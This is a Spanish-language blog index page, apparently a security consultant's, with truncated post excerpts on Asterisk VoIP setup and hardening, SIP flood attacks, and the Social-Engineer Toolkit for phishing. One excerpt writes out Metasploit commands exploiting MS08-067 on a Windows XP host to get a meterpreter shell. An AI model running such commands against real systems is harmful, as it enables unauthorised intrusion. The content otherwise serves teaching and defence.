-
Continue reading →: Framework para ataques de ingenieria social «The Social-Engineer Toolkit : SET»
SET , es un conjunto de herramientas diseñadas para hacer ataques de ingenieria social , esta programado en python por David Kennedy , es capas de realizar envios de correo electronico individulaes o masivos , para realizar capturas de contraseñas mediante falsificacion de paginas web (ejem gmail) , obtencion de…
-
Continue reading →: Ingresando a un Windows XP con Metasploit
Metasploit es un framework de seguridad bastante conocido, el siguiente método mostrara como obtener una shell de un WIn XP SP3 explotando la vulnerabilidad MS08-067 de Windows Instalando Metasploit #wget http://updates.metasploit.com/data/releases/framework-3.5.0.tar.bz2 #tar xvfz framework-3.5.0.tar.bz2 #cd framework-3.5.0/bin #./msfconsole msf>use windows/smb/ms08_067_netapi msf>set RHOST 192.168.0.24 msf>set PAYLOAD windows/meterpreter/bind_tcp msf>exploit meterpreter > shell Process…
-
Continue reading →: Ataques sip inviteflood a un Asterisk
En realidad este no es un concepto nuevo, siempre ha existido y mas por la deficiencia del protocolo sip que por el tipo de plataforma. El método consiste en explotar una vulnerabilidad del protocolo SIP , haciendo un envio masivo de peticiones INVITE de esta forma : Instalación de la…
-
Continue reading →: Asterisk 1.8 finalmente lanzado
Bueno después de mucha expectativa finalmente fue lanzada la nueva version de asterisk, segun los desarrolladores, las caracteristicas mas fuertes seran su estabilidad(tal como en la 1.4) la seguridad pero sobre todo la variedad de caracteristicas que trae : – Call Completion Supplementary Service , un callback mejorado mucho simple…
-
Continue reading →: Proteger Asterisk de ataques por SIP
Los ataques siempre han existido y van a existir , eso es particularmente mas por desconocimiento del protocolo sip , que por Asterisk en si , teniendo en cuenta que la mayoría somos linux admin , nos preocupamos mucho de hacer harddering al linux , pero no se hacer análisis…
-
Continue reading →: Unión Elastix y Asterisk puro vía sip trunk
Hay varias formas de hacer esto pero el mayor lío es pasar correctamente los callerid entre ambos , después de probar un par de opciones llegue a esta , la cual comparto : Escenario Elastix : 192.168.10.254 / Contexto : from-internal Asterisk Puro : 192.168.10.4 / Contexto : elquedeseen A.-…
-
Continue reading →: Asterisk SIP Realtime , extensiones sip desde base de datos
A petición de los alumnos del curso de Telefonía IP con Asterisk , el cual tengo el gusto de dictar en la U. del Callao , aquí les dejo un pequeño manual de como configurar Realtime en Asterisk para la creación de extensiones sip desde una base de datos mysql.…
-
Continue reading →: Flisol 2010 en la Universidad del Callao
El pasado sábado 24 , como saben se desarrollo el Flisol , para lo cual tuvimos el gusto en SILCOM de recibir la invitación de los chicos de UNACINUX para participar en la sede CALLAO , con un stand para demostración de Telefonía ip con Asterisk así como una charla…
-
Continue reading →: Comprobar si un servidor Asterisk es vulnerable
Como saben (en todo caso les comento si no) , una mala configuración de un servidor Asterisk , conectado a Internet , puede causar que un atacante remoto , pueda generar llamadas a cualquier destino, lo cual es sumamente peligroso. es así , que en algún momento se reporto hackeos…
-
Continue reading →: Ya soy Certificado en LPI y Novell
Después de rendir los exámenes correspondientes y por supuesto aprobarlos 😀 , puedo decir que he obtenido la certificaciones «Linux Professional Certification LPIC-1» , y también «Novell Certified Linux Administrator (CLA-11)» , así que no me faltan motivos para celebrar.
Juan Oliva
Consultor en Ciberseguridad con mas de 17 años de experiencia en el campo, muy involucrado en proyectos de Ethical Hacking, análisis y explotación de vulnerabilidades en infraestructura, aplicaciones web, APIs y Móviles, pruebas de ingeniería social y revisión de código.
Juan Oliva 